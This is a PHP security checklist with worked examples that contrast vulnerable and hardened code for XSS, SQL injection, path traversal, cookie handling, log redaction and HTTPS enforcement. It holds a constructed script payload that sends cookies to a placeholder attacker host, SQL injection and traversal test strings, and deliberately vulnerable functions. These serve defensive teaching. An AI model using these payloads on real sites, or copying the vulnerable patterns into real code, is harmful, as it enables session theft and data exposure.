PHP security rules


Please refer to the Product Safety Checklist.

Input and output
Check whether user-supplied data is encoded (or filtered) before it is rendered as HTML
Possible problems: If an attacker can inject HTML or JavaScript into a page (cross-site scripting, XSS), the script can steal cookies, display a fake login form, or deface the website. Encoding output for the context it lands in (HTML body, attribute, script) is more reliable than trying to strip "bad" tags from input.
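As an added illustration of this check (example code, not part of the original checklist), the following PHP shows the same attacker input rendered raw and then encoded for each output context. The attacker strings and the helper names h() and jsLiteral() are constructed for the example.

```php
<?php
// Added example (not from the original checklist): output encoding for
// user-controlled data, which is what "HTML code filtering" should mean.
declare(strict_types=1);

// Encode a value for insertion into an HTML body or a quoted attribute.
function h(string $value): string
{
    // ENT_QUOTES encodes both ' and "; ENT_SUBSTITUTE replaces invalid UTF-8
    // instead of returning '' (which would silently drop the output).
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Encode a value for use as a string literal inside an inline <script> block.
function jsLiteral(string $value): string
{
    // The JSON_HEX_* flags escape < > ' " & so the literal cannot close the
    // <script> element or break out of the surrounding markup.
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP | JSON_THROW_ON_ERROR
    );
}

// Constructed attacker input: a cookie-stealing script and an attribute breakout.
$name  = '<script>location="https://evil.example/?c="+document.cookie</script>';
$title = '" onmouseover="alert(1)';

// Vulnerable: raw interpolation renders the script and ships document.cookie.
$vulnerable = "<p>Hello, $name</p><input value=\"$title\">";

// Hardened: every interpolation point is encoded for its own context.
$safe = '<p>Hello, ' . h($name) . '</p>'
      . '<input value="' . h($title) . '">'
      . '<script>var who = ' . jsLiteral($name) . ';</script>';

echo "VULNERABLE:\n$vulnerable\n\nSAFE:\n$safe\n";
```

Note that strip_tags() alone is not a substitute: it does nothing for the attribute breakout above, and encoding must happen at output time, in the context where the value is used.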
Check whether variables are escaped (or, better, bound as parameters) before they are used in database operations
Possible problems: If a string variable written into a query contains special characters such as quotation marks (' or ") or a semicolon (;), the query can be altered to perform unexpected operations (SQL injection).
Recommended method: use prepared statements with bound parameters (PDO or mysqli). The document's original recommendation, mysql_escape_string() or an equivalent function, is no longer adequate: mysql_escape_string() ignores the connection character set and, together with the whole mysql_* extension, was removed in PHP 7.0. If escaping must be used, use the driver's real-escape function (for example mysqli_real_escape_string()), and remember that escaping quotes does nothing for values interpolated into an unquoted numeric position.
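The following added example (not from the original checklist) puts the vulnerable string-concatenation query next to the prepared-statement form and shows the unquoted-number case that escaping cannot fix. It uses an in-memory SQLite database and constructed rows so it runs offline; it assumes the pdo_sqlite extension is available. The function names are chosen for the example.

```php
<?php
// Added example: SQL injection via string concatenation vs. bound parameters.
declare(strict_types=1);

// Vulnerable: the user-supplied value becomes part of the SQL text.
function findUserVulnerable(PDO $db, string $username): array
{
    $sql = "SELECT id, username FROM users WHERE username = '$username'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: a prepared statement; the value is sent as data, never as SQL.
function findUser(PDO $db, string $username): array
{
    $stmt = $db->prepare('SELECT id, username FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Numeric context: "WHERE id = $id" has no quotes to escape, so quote-escaping
// is useless there. Validate the type, then bind it as an integer.
function findUserById(PDO $db, string $rawId): ?array
{
    if (!ctype_digit($rawId)) {
        return null; // reject "1 OR 1=1" rather than interpolate it
    }
    $stmt = $db->prepare('SELECT id, username FROM users WHERE id = ?');
    $stmt->bindValue(1, (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT NOT NULL)');
$db->exec("INSERT INTO users (username) VALUES ('alice'), ('bob')");

$payload = "' OR '1'='1";
printf("vulnerable: %d rows returned (every user leaks)\n", count(findUserVulnerable($db, $payload)));
printf("prepared:   %d rows returned (payload matched literally)\n", count(findUser($db, $payload)));
printf("numeric:    %s\n", findUserById($db, '1 OR 1=1') === null ? 'rejected' : 'accepted');
printf("numeric:    %s\n", json_encode(findUserById($db, '2')));
```

With MySQL, also set PDO::ATTR_EMULATE_PREPARES to false so the statement is prepared server-side rather than assembled client-side.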
Check that input values are valid for the purpose they are used for
Possible problems: Abnormal values can cause problems. Failing to validate input will result in illegal or erroneous data being stored in UDB or other databases, or in unexpected program behaviour.
Example:
If the program uses a user-supplied parameter value as a file name for file operations, a malicious input naming a system file (for example by path traversal with ../) can expose or damage the system.
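The example below (added here; not the checklist's own code) shows one way to validate a user-supplied file name for the case just described: only a bare file name inside a fixed directory is accepted, and the resolved real path is checked against that directory so traversal and symlink escapes are rejected. The directory, file, test inputs and the function name safePathInDir() are constructed for the example.

```php
<?php
// Added example: validating a user-controlled file name before a file operation.
declare(strict_types=1);

// Resolve $userName inside $baseDir and refuse anything that escapes it.
// Returns the canonical path of an existing file, or null on rejection.
function safePathInDir(string $baseDir, string $userName): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // Control characters and NUL are never legitimate in a file name; older PHP
    // truncated paths at NUL, which attackers used to bypass extension checks.
    if (preg_match('/[\x00-\x1f]/', $userName)) {
        return null;
    }
    // Accept only a single path component: no separators, no "..", no dotfiles.
    if ($userName === '' || $userName !== basename($userName) || $userName[0] === '.') {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $userName);
    if ($candidate === false) {
        return null; // file does not exist
    }
    // realpath() follows symlinks, so confirm the result still lies under $base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed demo directory and file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'uploads_demo_' . getmypid();
mkdir($dir, 0700);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'report.txt', "quarterly numbers\n");

$inputs = ['report.txt', '../../../etc/passwd', "report.txt\0.jpg", '.htaccess', 'missing.txt'];
foreach ($inputs as $input) {
    $resolved = safePathInDir($dir, $input);
    printf("%-26s => %s\n", json_encode($input), $resolved ?? 'REJECTED');
}

unlink($dir . DIRECTORY_SEPARATOR . 'report.txt');
rmdir($dir);
```

Where the set of files is known in advance, an explicit allowlist (a map from request parameter to path) is simpler still and removes the file name from user control entirely.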
Verify how cookies are used and how user data is handled
Possible problems: Incorrect use of cookies (storing user data directly in them, omitting the Secure and HttpOnly flags, trusting cookie contents without validation) can leak user data or let an attacker impersonate a user.
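As an added example (not from the original checklist), the following PHP configures the session cookie so that only an opaque session id reaches the browser, with the flags that limit theft and cross-site use, and contrasts it with the anti-pattern of storing user data in a readable cookie. The function names and the user id are constructed for the example; it needs PHP 7.3 or later for the array form of session_set_cookie_params().

```php
<?php
// Added example: session cookie hardening vs. user data stored in a cookie.
declare(strict_types=1);

// Call before session_start(). User data lives server-side in $_SESSION; the
// browser only holds an id it cannot decode or usefully edit.
function configureSessionCookie(bool $httpsOnly = true): void
{
    session_set_cookie_params([
        'lifetime' => 0,          // discarded when the browser closes
        'path'     => '/',
        'domain'   => '',         // current host only
        'secure'   => $httpsOnly, // never sent over plain HTTP
        'httponly' => true,       // hidden from document.cookie, blunts XSS cookie theft
        'samesite' => 'Lax',      // not attached to cross-site POSTs, reduces CSRF
    ]);
    ini_set('session.use_strict_mode', '1');  // reject ids the server did not issue
    ini_set('session.use_only_cookies', '1'); // never accept a session id from the URL
}

// On successful login, rotate the id so a pre-login id planted by an attacker
// (session fixation) is worthless.
function loginUser(int $userId): void
{
    session_regenerate_id(true);
    $_SESSION['uid']      = $userId;
    $_SESSION['login_at'] = time();
}

// Anti-pattern the checklist warns about: user data in a cookie the client can
// read and rewrite, so "role" is attacker-controlled and the id leaks to any
// script or proxy that sees the cookie.
function insecureRememberMe(int $userId, string $role): void
{
    setcookie('user', $userId . ':' . $role, ['expires' => time() + 30 * 86400, 'path' => '/']);
}

configureSessionCookie();
session_start();
loginUser(42);
echo 'session id set, user data kept server-side: ', json_encode($_SESSION), PHP_EOL;
```

If a "remember me" cookie is genuinely needed, store a random token that is looked up (and can be revoked) server-side, not the user's identity or role.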
Access control
For products used internally or by partners, consider adding access control rather than relying on the URL being unknown
logs
Ensure that users’ confidential information is not recorded in the log (for example: user's password)
Ensure that complete user access records are saved for key user operations
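The following added example (not the checklist's own code) serves both log rules above: it redacts sensitive fields before request data is logged, and writes one structured audit record per security-relevant operation. The key fragments, the field layout and the function names redact() and auditLog() are choices made for this example.

```php
<?php
// Added example: keep secrets out of logs, keep an audit trail of key operations.
declare(strict_types=1);

// Any key containing one of these fragments is treated as sensitive.
const SENSITIVE_KEY_FRAGMENTS = ['password', 'passwd', 'pwd', 'token', 'secret', 'authorization', 'cookie', 'card'];

function isSensitiveKey(string $key): bool
{
    $k = strtolower($key);
    foreach (SENSITIVE_KEY_FRAGMENTS as $fragment) {
        if (strpos($k, $fragment) !== false) {
            return true;
        }
    }
    return false;
}

// Recursively replace sensitive values before the structure is serialised.
function redact(array $data): array
{
    foreach ($data as $key => $value) {
        if (is_array($value)) {
            $data[$key] = redact($value);
        } elseif (is_string($key) && isSensitiveKey($key)) {
            $data[$key] = '[REDACTED]';
        }
    }
    return $data;
}

// One JSON line per audit event: when, who, what, on which object, from where,
// and whether it succeeded. Returns the line so callers can test or forward it.
function auditLog(string $action, ?int $actorId, string $target, bool $ok, array $context = []): string
{
    $record = [
        'ts'     => gmdate('c'),
        'actor'  => $actorId,
        'action' => $action,
        'target' => $target,
        'ok'     => $ok,
        'ip'     => $_SERVER['REMOTE_ADDR'] ?? 'cli',
        'ctx'    => redact($context),
    ];
    $line = json_encode($record, JSON_UNESCAPED_SLASHES | JSON_THROW_ON_ERROR);
    error_log($line); // in production, append to a dedicated audit log
    return $line;
}

// Constructed request data, as it would arrive in $_POST.
$post = ['username' => 'alice', 'password' => 'hunter2', 'remember' => '1'];

// Wrong: dumping the whole request writes the password to the log.
echo 'BAD  : login attempt ' . json_encode($post), PHP_EOL;

// Right: redact, and record the operation as an audit event.
echo 'GOOD : ', auditLog('login', 7, 'user:alice', true, $post), PHP_EOL;
echo 'GOOD : ', auditLog('password_change', 7, 'user:alice', true,
    ['old_password' => 'hunter2', 'new_password' => 'correct horse']), PHP_EOL;
echo 'GOOD : ', auditLog('login', null, 'user:alice', false, ['reason' => 'bad credentials']), PHP_EOL;
```

Failed attempts are worth recording too: a burst of failed logins for one account is the kind of event the "complete access records" rule is meant to make visible.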
https
Use https for the transmission of sensitive data
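As an added example (not from the original checklist), the PHP below enforces the rule at the application layer: plain-HTTP GET requests are redirected to the HTTPS version of a configured canonical host, non-GET requests over plain HTTP are refused rather than replayed, and HTTPS responses carry a Strict-Transport-Security header so the browser upgrades future requests itself. The canonical host name and the trusted-proxy flag are assumptions for the example.

```php
<?php
// Added example: refusing to carry sensitive data over plain HTTP.
declare(strict_types=1);

// Assumed canonical host; never build the redirect from the client's Host header,
// or the Host header becomes an open-redirect vector.
const CANONICAL_HOST = 'www.example.com';

// True when the request arrived over TLS. X-Forwarded-Proto is honoured only
// when a trusted reverse proxy in front is known to overwrite it; otherwise any
// client can claim to be HTTPS.
function isHttps(array $server, bool $behindTrustedProxy = false): bool
{
    if (!empty($server['HTTPS']) && strtolower((string) $server['HTTPS']) !== 'off') {
        return true;
    }
    return $behindTrustedProxy
        && strtolower((string) ($server['HTTP_X_FORWARDED_PROTO'] ?? '')) === 'https';
}

function requireHttps(array $server, bool $behindTrustedProxy = false): void
{
    if (isHttps($server, $behindTrustedProxy)) {
        // HSTS: the browser will refuse plain HTTP for this host for a year.
        header('Strict-Transport-Security: max-age=31536000; includeSubDomains');
        return;
    }
    if (($server['REQUEST_METHOD'] ?? 'GET') !== 'GET') {
        // A POST body (credentials, form data) already crossed the wire in clear;
        // redirecting would just send it again. Fail instead.
        http_response_code(403);
        exit('HTTPS required');
    }
    $uri = $server['REQUEST_URI'] ?? '/';
    header('Location: https://' . CANONICAL_HOST . $uri, true, 301);
    exit;
}

if (PHP_SAPI !== 'cli') {
    requireHttps($_SERVER);
} else {
    // Constructed requests for a dry run on the command line.
    var_dump(isHttps(['HTTPS' => 'on']));                                  // true
    var_dump(isHttps(['HTTP_X_FORWARDED_PROTO' => 'https']));             // false: proxy not trusted
    var_dump(isHttps(['HTTP_X_FORWARDED_PROTO' => 'https'], true));       // true
}
```

Pair this with the Secure flag on the session cookie, since HTTPS on the server does nothing if the browser is still willing to send the cookie over HTTP.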